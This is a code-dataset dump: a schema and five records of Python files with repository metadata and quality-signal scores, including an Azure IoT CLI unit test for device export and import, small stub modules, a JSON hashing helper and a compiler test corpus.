Dataset schema (113 columns), reconstructed from the flattened name/dtype header:

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |

One record per block follows: repository metadata, the raw file `content`, then the record's quality-signal values.
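
For working with the dump programmatically, a minimal loading sketch (assuming the records are stored as Parquet; the file name `data.parquet` is illustrative, not something the dump specifies):

```python
import pandas as pd

# Hypothetical file name; the dump does not say where the records live.
df = pd.read_parquet("data.parquet")

# 113 columns per the schema above; keep the identifying ones plus content.
subset = df[["hexsha", "size", "ext", "lang", "content", "effective", "hits"]]
print(subset.head())

# `effective` is typed string in the schema, so compare against "0", not 0.
flagged = df[df["effective"] == "0"]
print(f"{len(flagged)}/{len(df)} records carry effective == '0'")
```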

---

| hexsha | size | ext | lang |
|---|---|---|---|
| fd37e63258f7581fcf91ccc21dd12c4cfe255955 | 13,795 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | azext_iot/tests/iothub/core/test_iot_hub_unit.py | lucadruda/azure-iot-cli-extension | 9d2f677d19580f8fbac860e079550167e743a237 | ["MIT"] | 79 | 2017-09-25T19:29:17.000Z | 2022-03-30T20:55:57.000Z |
| max_issues | azext_iot/tests/iothub/core/test_iot_hub_unit.py | lucadruda/azure-iot-cli-extension | 9d2f677d19580f8fbac860e079550167e743a237 | ["MIT"] | 305 | 2018-01-17T01:12:10.000Z | 2022-03-23T22:38:11.000Z |
| max_forks | azext_iot/tests/iothub/core/test_iot_hub_unit.py | lucadruda/azure-iot-cli-extension | 9d2f677d19580f8fbac860e079550167e743a237 | ["MIT"] | 69 | 2017-11-14T00:30:46.000Z | 2022-03-01T17:11:45.000Z |

content:

```python
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import re
import pytest
import responses
import json
from knack.cli import CLIError
from azext_iot.operations import hub as subject
from azext_iot.tests.generators import generate_generic_id
from azext_iot.common.utility import ensure_iothub_sdk_min_version
from azext_iot.constants import IOTHUB_TRACK_2_SDK_MIN_VERSION
hub_name = "HUBNAME"
blob_container_uri = "https://example.com"
resource_group_name = "RESOURCEGROUP"
managed_identity = "EXAMPLEMANAGEDIDENTITY"
generic_job_response = {"JobResponse": generate_generic_id()}
qualified_hostname = "{}.subdomain.domain".format(hub_name)
@pytest.fixture
def get_mgmt_client(mocker, fixture_cmd):
from azure.mgmt.iothub import IotHubClient
# discovery call to find iothub
patch_discovery = mocker.patch(
"azext_iot.iothub.providers.discovery.IotHubDiscovery.get_target"
)
patch_discovery.return_value = {
"resourcegroup": resource_group_name
}
# raw token for login credentials
patched_get_raw_token = mocker.patch(
"azure.cli.core._profile.Profile.get_raw_token"
)
patched_get_raw_token.return_value = (
mocker.MagicMock(name="creds"),
mocker.MagicMock(name="subscription"),
mocker.MagicMock(name="tenant"),
)
patched_get_login_credentials = mocker.patch(
"azure.cli.core._profile.Profile.get_login_credentials"
)
patched_get_login_credentials.return_value = (
mocker.MagicMock(name="subscription"),
mocker.MagicMock(name="tenant"),
)
patch = mocker.patch(
"azext_iot._factory.iot_hub_service_factory"
)
# pylint: disable=no-value-for-parameter, unexpected-keyword-arg
if ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION):
patch.return_value = IotHubClient(
credential='',
subscription_id="00000000-0000-0000-0000-000000000000",
).iot_hub_resource
else:
patch.return_value = IotHubClient(
credentials='',
subscription_id="00000000-0000-0000-0000-000000000000",
).iot_hub_resource
return patch
def generate_device_identity(include_keys=False, auth_type=None, identity=None, rg=None):
return {
"include_keys": include_keys,
"storage_authentication_type": auth_type,
"identity": identity,
"resource_group_name": rg
}
def assert_device_identity_result(actual, expected):
# the body from the call will be put into additional_properties
assert actual.job_id is None
assert actual.start_time_utc is None
assert actual.end_time_utc is None
assert actual.type is None
assert actual.status is None
assert actual.failure_reason is None
assert actual.status_message is None
assert actual.parent_job_id is None
assert actual.additional_properties == expected
class TestIoTHubDeviceIdentityExport(object):
@pytest.fixture
def service_client(self, mocked_response, get_mgmt_client):
mocked_response.assert_all_requests_are_fired = False
mocked_response.add(
method=responses.GET,
content_type="application/json",
url=re.compile(
"https://(.*)management.azure.com/subscriptions/(.*)/"
"providers/Microsoft.Devices/IotHubs"
),
status=200,
match_querystring=False,
body=json.dumps({"hostName": qualified_hostname}),
)
mocked_response.add(
method=responses.POST,
url=re.compile(
"https://management.azure.com/subscriptions/(.*)/"
"providers/Microsoft.Devices/IotHubs/{}/exportDevices".format(
hub_name
)
),
body=json.dumps(generic_job_response),
status=200,
content_type="application/json",
match_querystring=False,
)
yield mocked_response
@pytest.mark.parametrize(
"req",
[
generate_device_identity(),
generate_device_identity(include_keys=True),
generate_device_identity(auth_type="identity"),
generate_device_identity(auth_type="key"),
generate_device_identity(rg=resource_group_name),
]
)
def test_device_identity_export_track1(self, fixture_cmd, service_client, req):
result = subject.iot_device_export(
cmd=fixture_cmd,
hub_name=hub_name,
blob_container_uri=blob_container_uri,
include_keys=req["include_keys"],
storage_authentication_type=req["storage_authentication_type"],
resource_group_name=req["resource_group_name"],
)
request = service_client.calls[0].request
request_body = json.loads(request.body)
assert request_body["exportBlobContainerUri"] == blob_container_uri
assert request_body["excludeKeys"] == (not req["include_keys"])
if req["storage_authentication_type"]:
assert request_body["authenticationType"] == req["storage_authentication_type"] + "Based"
if req["storage_authentication_type"] == "identityBased" and req["identity"] not in (None, "[system]"):
assert request_body["identity"]["userAssignedIdentity"] == req["identity"]
assert_device_identity_result(result, generic_job_response)
@pytest.mark.parametrize(
"req",
[
generate_device_identity(),
generate_device_identity(include_keys=True),
generate_device_identity(auth_type="identity"),
generate_device_identity(auth_type="key"),
generate_device_identity(rg=resource_group_name),
generate_device_identity(auth_type="identity", identity="[system]"),
generate_device_identity(auth_type="identity", identity="system"),
generate_device_identity(auth_type="identity", identity="managed_identity"),
]
)
@pytest.mark.skipif(
not ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION),
reason="Skipping track 2 tests because SDK is track 1")
def test_device_identity_export_track2(self, fixture_cmd, service_client, req):
result = subject.iot_device_export(
cmd=fixture_cmd,
hub_name=hub_name,
blob_container_uri=blob_container_uri,
include_keys=req["include_keys"],
storage_authentication_type=req["storage_authentication_type"],
identity=req["identity"],
resource_group_name=req["resource_group_name"],
)
request = service_client.calls[0].request
request_body = json.loads(request.body)
assert request_body["exportBlobContainerUri"] == blob_container_uri
assert request_body["excludeKeys"] == (not req["include_keys"])
if req["storage_authentication_type"]:
assert request_body["authenticationType"] == req["storage_authentication_type"] + "Based"
if req["storage_authentication_type"] == "identityBased" and req["identity"] not in (None, "[system]"):
assert request_body["identity"]["userAssignedIdentity"] == req["identity"]
assert_device_identity_result(result, generic_job_response)
@pytest.mark.parametrize(
"req",
[
generate_device_identity(auth_type="key", identity="[system]"),
generate_device_identity(auth_type="key", identity="system"),
]
)
@pytest.mark.skipif(
not ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION),
reason="Skipping track 2 tests because SDK is track 1")
def test_device_identity_export_input(self, fixture_cmd, req):
with pytest.raises(CLIError):
subject.iot_device_export(
cmd=fixture_cmd,
hub_name=hub_name,
blob_container_uri=blob_container_uri,
include_keys=req["include_keys"],
storage_authentication_type=req["storage_authentication_type"],
identity=req["identity"],
resource_group_name=req["resource_group_name"],
)
class TestIoTHubDeviceIdentityImport(object):
@pytest.fixture
def service_client(self, mocked_response, get_mgmt_client):
mocked_response.assert_all_requests_are_fired = False
mocked_response.add(
method=responses.GET,
content_type="application/json",
url=re.compile(
"https://(.*)management.azure.com/subscriptions/(.*)/"
"providers/Microsoft.Devices/IotHubs"
),
status=200,
match_querystring=False,
body=json.dumps({"hostName": qualified_hostname}),
)
mocked_response.add(
method=responses.POST,
content_type="application/json",
url=re.compile(
"https://management.azure.com/subscriptions/(.*)/"
"providers/Microsoft.Devices/IotHubs/{}/importDevices".format(
hub_name
)
),
status=200,
match_querystring=False,
body=json.dumps(generic_job_response),
)
yield mocked_response
@pytest.mark.parametrize(
"req",
[
generate_device_identity(),
generate_device_identity(auth_type="identity"),
generate_device_identity(auth_type="key"),
generate_device_identity(rg=resource_group_name),
]
)
def test_device_identity_import_track1(self, fixture_cmd, service_client, req):
result = subject.iot_device_import(
cmd=fixture_cmd,
hub_name=hub_name,
input_blob_container_uri=blob_container_uri,
output_blob_container_uri=blob_container_uri + "2",
storage_authentication_type=req["storage_authentication_type"],
resource_group_name=req["resource_group_name"],
)
request = service_client.calls[0].request
request_body = json.loads(request.body)
assert request_body["inputBlobContainerUri"] == blob_container_uri
assert request_body["outputBlobContainerUri"] == blob_container_uri + "2"
if req["storage_authentication_type"]:
assert request_body["authenticationType"] == req["storage_authentication_type"] + "Based"
if req["storage_authentication_type"] == "identityBased" and req["identity"] not in (None, "[system]"):
assert request_body["identity"]["userAssignedIdentity"] == req["identity"]
assert_device_identity_result(result, generic_job_response)
@pytest.mark.parametrize(
"req",
[
generate_device_identity(),
generate_device_identity(auth_type="identity"),
generate_device_identity(auth_type="key"),
generate_device_identity(rg=resource_group_name),
generate_device_identity(auth_type="identity", identity="[system]"),
generate_device_identity(auth_type="identity", identity="managed_identity"),
]
)
@pytest.mark.skipif(
not ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION),
reason="Skipping track 2 tests because SDK is track 1")
def test_device_identity_import_track2(self, fixture_cmd, service_client, req):
result = subject.iot_device_import(
cmd=fixture_cmd,
hub_name=hub_name,
input_blob_container_uri=blob_container_uri,
output_blob_container_uri=blob_container_uri + "2",
storage_authentication_type=req["storage_authentication_type"],
identity=req["identity"],
resource_group_name=req["resource_group_name"],
)
request = service_client.calls[0].request
request_body = json.loads(request.body)
assert request_body["inputBlobContainerUri"] == blob_container_uri
assert request_body["outputBlobContainerUri"] == blob_container_uri + "2"
if req["storage_authentication_type"]:
assert request_body["authenticationType"] == req["storage_authentication_type"] + "Based"
if req["storage_authentication_type"] == "identityBased" and req["identity"] not in (None, "[system]"):
assert request_body["identity"]["userAssignedIdentity"] == req["identity"]
assert_device_identity_result(result, generic_job_response)
@pytest.mark.parametrize(
"req",
[
generate_device_identity(auth_type="key", identity="[system]"),
generate_device_identity(auth_type="key", identity="managed_identity"),
]
)
@pytest.mark.skipif(
not ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION),
reason="Skipping track 2 tests because SDK is track 1")
def test_device_identity_import_input(self, fixture_cmd, req):
with pytest.raises(CLIError):
subject.iot_device_import(
cmd=fixture_cmd,
hub_name=hub_name,
input_blob_container_uri=blob_container_uri,
output_blob_container_uri=blob_container_uri + "2",
storage_authentication_type=req["storage_authentication_type"],
identity=req["identity"],
resource_group_name=req["resource_group_name"],
)
```

Quality signals (names shortened here and in every record below: the qsc_code_/qsc_codepython_ prefix and the _quality_signal suffix are dropped, with Python-specific signals marked py_*): avg_line_length 40.336257; max_line_length 111; alphanum_fraction 0.653063; num_words 1,463; num_chars 13,795; mean_word_length 5.81203; frac_words_unique 0.142857; frac_chars_top_2grams 0.064213; frac_chars_top_3grams 0.072445; frac_chars_top_4grams 0.059273; frac_chars_dupe_5grams 0.809126; frac_chars_dupe_6grams 0.786193; frac_chars_dupe_7grams 0.7662; frac_chars_dupe_8grams 0.7662; frac_chars_dupe_9grams 0.737857; frac_chars_dupe_10grams 0.737857; frac_chars_replacement_symbols 0; frac_chars_digital 0.009893; frac_chars_whitespace 0.237985; size_file_byte 13,795; num_lines 341; num_chars_line_max 112; num_chars_line_mean 40.454545; frac_chars_alphabet 0.798992; frac_chars_comments 0.038855; cate_xml_start 0; frac_lines_dupe_lines 0.645051; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0.190731; frac_chars_long_word_length 0.084082; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0.109215; py_cate_ast 1; py_frac_lines_func_ratio 0.037543; py_cate_var_zero false; py_frac_lines_pass 0; py_frac_lines_import 0.061433; py_frac_lines_simplefunc 0.003413; py_score_lines_no_logic 0.112628; py_frac_lines_print 0.

Hit flags: 1 for frac_chars_dupe_5grams through frac_chars_dupe_10grams; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.
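
Most of the surface-level signals can be recomputed directly from `content`. A minimal sketch of the presumed definitions of four of them (the pipeline's exact tokenization is not documented in the dump, so treat these as approximations):

```python
def surface_signals(content: str) -> dict:
    """Approximate recomputation of four schema columns from raw source."""
    lines = content.splitlines()
    chars = max(len(content), 1)
    return {
        # avg/max line length: per-line character counts.
        "avg_line_length": sum(len(ln) for ln in lines) / max(len(lines), 1),
        "max_line_length": max((len(ln) for ln in lines), default=0),
        # alphanum_fraction: share of characters that are alphanumeric.
        "alphanum_fraction": sum(c.isalnum() for c in content) / chars,
        # frac_chars_whitespace: share of characters that are whitespace.
        "frac_chars_whitespace": sum(c.isspace() for c in content) / chars,
    }

# Under these definitions the record above should land near
# 40.34, 111, 0.653 and 0.238 respectively.
```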

---

| hexsha | size | ext | lang |
|---|---|---|---|
| fd585de17660ec6b8b50f7a557be2e279a20db4d | 67 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | codes/blocks/sand.py | shenjackyuanjie/Minecraft | 964e65ec30098eba56c481faa78a5c11dbe5bcbb | ["MIT"] | 2 | 2020-10-15T12:44:11.000Z | 2022-02-27T12:06:43.000Z |
| max_issues | codes/blocks/sand.py | shenjackyuanjie/Minecraft_PE | 964e65ec30098eba56c481faa78a5c11dbe5bcbb | ["MIT"] | null | null | null |
| max_forks | codes/blocks/sand.py | shenjackyuanjie/Minecraft_PE | 964e65ec30098eba56c481faa78a5c11dbe5bcbb | ["MIT"] | null | null | null |

content:

```python
def ben_update():
return
def ben_random_tick():
return
```

Quality signals: avg_line_length 7.444444; max_line_length 22; alphanum_fraction 0.641791; num_words 9; num_chars 67; mean_word_length 4.444444; frac_words_unique 0.666667; frac_chars_top_2grams 0.3; frac_chars_top_3grams 0; frac_chars_top_4grams 0; frac_chars_dupe_5grams through dupe_10grams 0; frac_chars_replacement_symbols 0; frac_chars_digital 0; frac_chars_whitespace 0.268657; size_file_byte 67; num_lines 8; num_chars_line_max 23; num_chars_line_mean 8.375; frac_chars_alphabet 0.816327; frac_chars_comments 0; cate_xml_start 0; frac_lines_dupe_lines 0.5; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0; frac_chars_long_word_length 0; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0; py_cate_ast 1; py_frac_lines_func_ratio 0.5; py_cate_var_zero true; py_frac_lines_pass 0; py_frac_lines_import 0; py_frac_lines_simplefunc 0.5; py_score_lines_no_logic 1; py_frac_lines_print 0.

Hit flags: 1 for num_words, frac_chars_top_2grams, num_lines, py_frac_lines_func_ratio, py_cate_var_zero, py_frac_lines_simplefunc; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.

---

| hexsha | size | ext | lang |
|---|---|---|---|
| b5d09508710930926876c1889db821e78bfa9ffa | 66 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | yetl/metaconf/_dataset.py | semanticinsight/yetl-framework | c9cf5b686cc3cb701c49e9e2a11a7bba1ecd6e73 | ["MIT"] | null | null | null |
| max_issues | yetl/metaconf/_dataset.py | semanticinsight/yetl-framework | c9cf5b686cc3cb701c49e9e2a11a7bba1ecd6e73 | ["MIT"] | null | null | null |
| max_forks | yetl/metaconf/_dataset.py | semanticinsight/yetl-framework | c9cf5b686cc3cb701c49e9e2a11a7bba1ecd6e73 | ["MIT"] | null | null | null |

content:

```python
from abc import ABC, abstractmethod
class DataSet(ABC):
pass
```

Quality signals: avg_line_length 13.2; max_line_length 35; alphanum_fraction 0.742424; num_words 9; num_chars 66; mean_word_length 5.444444; frac_words_unique 0.777778; frac_chars_top_2grams through top_4grams 0; frac_chars_dupe_5grams through dupe_10grams 0; frac_chars_replacement_symbols 0; frac_chars_digital 0; frac_chars_whitespace 0.19697; size_file_byte 66; num_lines 4; num_chars_line_max 36; num_chars_line_mean 16.5; frac_chars_alphabet 0.924528; frac_chars_comments 0; cate_xml_start 0; frac_lines_dupe_lines 0; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0; frac_chars_long_word_length 0; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0; py_cate_ast 1; py_frac_lines_func_ratio 0; py_cate_var_zero true; py_frac_lines_pass 0.333333; py_frac_lines_import 0.333333; py_frac_lines_simplefunc 0; py_score_lines_no_logic 0.666667; py_frac_lines_print 0.

Hit flags: 1 for num_words, num_lines, py_cate_var_zero, py_frac_lines_pass, py_frac_lines_import, py_score_lines_no_logic; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.

---

| hexsha | size | ext | lang |
|---|---|---|---|
| bd2f7e05e5f90d6af20a97b4725e51f03c0520ea | 2,151 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | modules/hasher.py | jpolgesek/zseilplan-python | 2eba0a676c43680523ef155afcd6979746bf00a0 | ["BSD-3-Clause"] | 3 | 2019-07-04T05:00:30.000Z | 2020-02-09T14:20:36.000Z |
| max_issues | modules/hasher.py | jpolgesek/zseilplan-python | 2eba0a676c43680523ef155afcd6979746bf00a0 | ["BSD-3-Clause"] | null | null | null |
| max_forks | modules/hasher.py | jpolgesek/zseilplan-python | 2eba0a676c43680523ef155afcd6979746bf00a0 | ["BSD-3-Clause"] | null | null | null |

content:

```python
#coding: utf-8
import hashlib
import json
def hash_output(output):
output = json.loads(output)
hash_input = ""
hash_input += output["_updateDate_min"] + "," + output["_updateDate_max"]
hash_input += json.dumps(output['timetable'], sort_keys=True) #Fails reindexing
#hash_input += json.dumps(output['teachers'], sort_keys=True) #Fails reindexing
hash_input += json.dumps(output['units'], sort_keys=True)
hash_input += json.dumps(output['classrooms'], sort_keys=True)
hash_input += json.dumps(output['teachermap'], sort_keys=True)
hash_input += json.dumps(output['timesteps'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
return str(hex_dig)
def hash_test(output):
output = json.loads(output)
hash_input = output["_updateDate_min"] + "," + output["_updateDate_max"]
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("A: {}".format(hex_dig))
hash_input = json.dumps(output['timetable'], sort_keys=True) #Fails reindexing
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("B: {}".format(hex_dig))
hash_input = json.dumps(output['teachers'], sort_keys=True) #Fails reindexing
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("C: {}".format(hex_dig))
hash_input = json.dumps(output['units'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("D: {}".format(hex_dig))
hash_input = json.dumps(output['classrooms'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("E: {}".format(hex_dig))
hash_input = json.dumps(output['teachermap'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("F: {}".format(hex_dig))
hash_input = json.dumps(output['timesteps'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("G: {}".format(hex_dig))
return str(hex_dig)
```

Quality signals: avg_line_length 40.584906; max_line_length 81; alphanum_fraction 0.733612; num_words 312; num_chars 2,151; mean_word_length 4.807692; frac_words_unique 0.141026; frac_chars_top_2grams 0.138; frac_chars_top_3grams 0.093333; frac_chars_top_4grams 0.144; frac_chars_dupe_5grams 0.929333; frac_chars_dupe_6grams 0.929333; frac_chars_dupe_7grams 0.929333; frac_chars_dupe_8grams 0.887333; frac_chars_dupe_9grams 0.839333; frac_chars_dupe_10grams 0.776667; frac_chars_replacement_symbols 0; frac_chars_digital 0.016975; frac_chars_whitespace 0.096234; size_file_byte 2,151; num_lines 52; num_chars_line_max 82; num_chars_line_mean 41.365385; frac_chars_alphabet 0.75463; frac_chars_comments 0.064621; cate_xml_start 0; frac_lines_dupe_lines 0.444444; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0.115155; frac_chars_long_word_length 0; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0; py_cate_ast 1; py_frac_lines_func_ratio 0.044444; py_cate_var_zero false; py_frac_lines_pass 0; py_frac_lines_import 0.044444; py_frac_lines_simplefunc 0; py_score_lines_no_logic 0.133333; py_frac_lines_print 0.155556.

Hit flags: 1 for frac_chars_dupe_5grams through frac_chars_dupe_10grams; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.
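
`hash_output` in the record above canonicalizes each JSON section with `sort_keys=True` before hashing, so two different serializations of the same data produce the same SHA-256. A minimal usage sketch (the payload keys mirror the ones the function reads; the values are invented):

```python
import json

payload = json.dumps({
    "_updateDate_min": "2019-01-01",
    "_updateDate_max": "2019-06-30",
    "timetable": {"mon": []},
    "units": {},
    "classrooms": {},
    "teachermap": {},
    "timesteps": [],
})
# hash_output expects the serialized JSON string, not a parsed dict.
print(hash_output(payload))  # 64-character hex SHA-256 digest
```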

---

| hexsha | size | ext | lang |
|---|---|---|---|
| bd38b1c45eb1f43e3334dd4513b41f25a7db5603 | 76 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | Lib/test/test_compiler/testcorpus/02_expr_rel.py | diogommartins/cinder | 79103e9119cbecef3b085ccf2878f00c26e1d175 | ["CNRI-Python-GPL-Compatible"] | 1,886 | 2021-05-03T23:58:43.000Z | 2022-03-31T19:15:58.000Z |
| max_issues | Lib/test/test_compiler/testcorpus/02_expr_rel.py | diogommartins/cinder | 79103e9119cbecef3b085ccf2878f00c26e1d175 | ["CNRI-Python-GPL-Compatible"] | 70 | 2021-05-04T23:25:35.000Z | 2022-03-31T18:42:08.000Z |
| max_forks | Lib/test/test_compiler/testcorpus/02_expr_rel.py | diogommartins/cinder | 79103e9119cbecef3b085ccf2878f00c26e1d175 | ["CNRI-Python-GPL-Compatible"] | 52 | 2021-05-04T21:26:03.000Z | 2022-03-08T18:02:56.000Z |

content:

```python
a == b
a != b
a < b
a <= b
a > b
a >= b
a is b
a is not b
a in b
a not in b
```

Quality signals: avg_line_length 6.909091; max_line_length 10; alphanum_fraction 0.447368; num_words 26; num_chars 76; mean_word_length 1.307692; frac_words_unique 0.192308; frac_chars_top_2grams 0.529412; frac_chars_top_3grams 0.529412; frac_chars_top_4grams 0.588235; frac_chars_dupe_5grams through dupe_10grams 0.382353 each; frac_chars_replacement_symbols 0; frac_chars_digital 0; frac_chars_whitespace 0.421053; size_file_byte 76; num_lines 10; num_chars_line_max 11; num_chars_line_mean 7.6; frac_chars_alphabet 0.772727; frac_chars_comments 0; cate_xml_start 0; frac_lines_dupe_lines 0; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0; frac_chars_long_word_length 0; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0; py_cate_ast 1; py_frac_lines_func_ratio 0; py_cate_var_zero true; py_frac_lines_pass 0; py_frac_lines_import 0; py_frac_lines_simplefunc 0; py_score_lines_no_logic 0; py_frac_lines_print 0.

Hit flags: 1 for num_words, mean_word_length, frac_chars_top_2grams, frac_chars_top_3grams, frac_chars_top_4grams, py_cate_var_zero; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.
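
`02_expr_rel.py` above is a compiler test-corpus file: ten bare comparison expressions, one per relational operator. A quick sketch confirming they parse as `Compare` nodes with the standard `ast` module:

```python
import ast

# Excerpt of the record's content.
src = "a == b\na != b\na < b\na is not b\na not in b\n"
tree = ast.parse(src)
# Each statement is an expression statement wrapping a Compare node.
assert all(
    isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Compare)
    for stmt in tree.body
)
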